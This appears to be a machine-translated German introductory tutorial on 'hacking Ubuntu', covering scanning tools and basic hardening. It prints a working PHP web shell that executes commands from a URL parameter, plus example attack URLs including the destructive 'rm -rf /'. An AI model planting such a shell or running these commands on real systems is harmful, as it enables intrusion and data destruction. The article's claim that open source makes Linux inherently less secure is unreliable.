Linux-Betriebssystem hacken: Hacken mit Ubuntu (Befehls-Tutorial)
Linux ist das am weitesten verbreitete Server-Betriebssystem, insbesondere für Webserver. Es ist Open Source, d. h. jeder kann auf den Quellcode zugreifen. Dies macht es im Vergleich zu anderen Betriebssystemen weniger sicher, da Angreifer den Quellcode untersuchen können, um Schwachstellen zu finden. Linux Bei „Hackers“ geht es darum, diese Schwachstellen auszunutzen, um sich unbefugten Zugriff auf ein System zu verschaffen.
In diesem Artikel stellen wir Ihnen vor, was Linux ist und welche Sicherheitslücken es beim Hacken gibt Ubuntu und welche Gegenmaßnahmen Sie ergreifen können.
Kurzer Hinweis zu Linux
Linux ist ein Open Source-Betriebssystem. Es gibt viele Distributionen von Linux-basierten Betriebssystemen wie Redhat, Fedora und Ubuntuusw. Im Gegensatz zu anderen Betriebssystemen ist Linux in Sachen Sicherheit weniger sicher. Dies liegt daran, dass der Quellcode frei verfügbar ist, sodass er im Vergleich zu anderen Betriebssystemen, die nicht Open Source sind, leicht auf Schwachstellen untersucht und ausgenutzt werden kann. Linux kann als Betriebssystem für Server, Desktops, Tablets oder Mobilgeräte verwendet werden.
Linux-Programme können entweder über GUI oder Befehle bedient werden. Die Linux-Befehle für Kali Linux Hacking sind effektiver und effizienter als die Verwendung der GUI. Aus diesem Grund ist es hilfreich, grundlegende Linux-Befehle zum Hacken zu kennen.
Sehen Sie sich diese Tutorials an https://www.guru99.com/unix-linux-tutorial.html wie man damit anfängt Kali Linux Hacks.
Linux-Hacking-Tools
- Nessus– Dieses Tool kann verwendet werden für Ubuntu Hacken, Konfigurationseinstellungen, Patches und Netzwerke scannen usw. finden Sie unter https://www.tenable.com/products/nessus
- NKarte. Mit diesem Tool können Hosts überwacht werden, die auf dem Server ausgeführt werden, sowie die von ihnen genutzten Dienste. Es kann auch zum Scannen nach Ports verwendet werden. Es ist zu finden unter https://nmap.org/
- SARA - SARA ist die Abkürzung für Security Auditor's Research Assistant. Wie der Name schon sagt, kann dieses Tool verwendet werden, um Netzwerke auf Bedrohungen wie zu überprüfen SQL Injection, XSS usw. finden Sie unter http://www-arc.com/sara/sara.html
Die obige Liste ist nicht vollständig; Es gibt Ihnen eine Vorstellung von den verfügbaren Werkzeugen Ubuntu Hacken und Hacken von Linux-Systemen.
So verhindern Sie Linux-Hacks
Linux-Hacking nutzt die Schwachstellen des Betriebssystems aus. Eine Organisation kann die folgende Richtlinie anwenden, um sich vor solchen Angriffen zu schützen.
- Patch-Management– Patches beheben Fehler, die Angreifer ausnutzen, um ein System zu kompromittieren. Eine gute Patch-Management-Richtlinie stellt sicher, dass Sie ständig relevante Patches auf Ihr System anwenden.
- Richtige Betriebssystemkonfiguration– Andere Exploits nutzen die Schwächen in der Konfiguration des Servers aus. Inaktive Benutzernamen und Daemons sollten deaktiviert werden. Standardeinstellungen wie allgemeine Passwörter für Anwendungen, Standardbenutzernamen und einige Portnummern sollten geändert werden.
- Intrusion Detection System– Mit solchen Tools können unbefugte Zugriffe auf das System erkannt werden. Einige Tools verfügen über die Fähigkeit, solche Angriffe zu erkennen und zu verhindern.
Hacking-Aktivität: Hack a Ubuntu Linux-System mit PHP
In diesem praktischen Szenario lernen wir, wie man mit hackt Ubuntu und wir stellen Ihnen grundlegende Informationen zur Verwendung zur Verfügung PHP ein Linux kompromittieren. Wir werden kein Opfer ins Visier nehmen. Wenn Sie es ausprobieren möchten, können Sie LAMPP auf Ihrem lokalen Computer installieren.
PHP verfügt über zwei Funktionen, mit denen Linux-Hacking-Befehle ausgeführt werden können. Es verfügt über die Funktionen exec() und shell_exec(). Die Funktion exec() gibt die letzte Zeile der Befehlsausgabe zurück, während shell_exec() das gesamte Ergebnis des Befehls als String zurückgibt.
Zu Demonstrationszwecken nehmen wir an, dass es dem Angreifer gelingt, die folgende Datei auf einen Webserver hochzuladen.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
HIER,
Das obige Skript ruft den Befehl von der GET-Variablen namens cmd ab. Der Befehl wird mit shell_exec() ausgeführt und die Ergebnisse werden im Browser zurückgegeben.
Der obige Code kann über die folgende URL ausgenutzt werden
http://localhost/cp/konsole.php?cmd=ls%20-l
HIER,
- „…konsole.php?cmd=ls%20-l“weist der Variablen cmd den Wert ls –l zu.
Der Befehl in Ubuntu zum Hacken gegen den Server wird ausgeführt als
shell_exec('ls -l') ;
Die Ausführung des obigen Codes auf einem Webserver führt zu Ergebnissen ähnlich den folgenden.
Der obige Befehl zeigt einfach die Dateien im aktuellen Verzeichnis und die Berechtigungen an
Nehmen wir an, der Angreifer gibt den folgenden Befehl ein
rm -rf /
HIER,
- „rm“ entfernt die Dateien
- „rf“ bewirkt, dass der Befehl rm in einem rekursiven Modus ausgeführt wird. Alle Ordner und Dateien löschen
- „/“ weist den Befehl an, mit dem Löschen von Dateien aus dem Stammverzeichnis zu beginnen
Die Angriffs-URL würde etwa so aussehen
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Zusammenfassung
- Linux ist ein beliebtes Betriebssystem für Server, Desktops, Tablets und Mobilgeräte.
- Linux ist Open Source und der Quellcode kann von jedem bezogen werden. Dies erleichtert das Erkennen von Schwachstellen. Es ist eines der besten Betriebssysteme für Hacker.
- Grundlegende und Netzwerk-Hacking-Befehle in Ubuntu sind für Linux-Hacker wertvoll.
- Schwachstellen sind Schwachstellen, die ausgenutzt werden können, um ein System zu kompromittieren.
- Eine gute Sicherheit kann dazu beitragen, ein System vor der Kompromittierung durch einen Angreifer zu schützen.